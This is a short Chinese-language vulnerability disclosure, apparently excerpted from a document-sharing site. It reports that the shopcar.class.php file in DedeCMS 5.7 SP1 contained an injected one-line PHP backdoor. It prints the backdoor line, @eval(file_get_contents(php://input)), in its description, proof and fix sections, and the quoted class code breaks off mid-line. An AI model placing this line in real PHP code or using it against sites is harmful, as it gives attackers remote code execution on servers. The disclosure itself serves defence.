dedecms5.7shopcar.class.php被植入一句话一句话后门利用.docVIP

dedecms 5.7 shopcar.class.php 被植入一句话 一句话后门利用漏洞详情 披露状态： 2012-03-20： 积极联系厂商并且等待厂商认领中，细节不对外公开2012-03-20： 厂商已经主动忽略漏洞，细节向公众公开 简要描述： DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码 详细说明： shopcar.class.php被植入一句话@eval(file_get_contents(php://input)); ? 漏洞证明： shopcar.class.php被植入一句话@eval(file_get_contents(php://input)); ? 修复方案： 删除@eval(file_get_contents(php://input));? shopcar.class.php 被植入一句话 ? @eval(file_get_contents(php://input)); 去官网下了一套回来，看了下代码， ? classMemberShops{var $OrdersId;var $productsId;function __construct(){ ? ? ? ?$this-OrdersId= $this-getCookie(OrdersId);if(empty($this-Order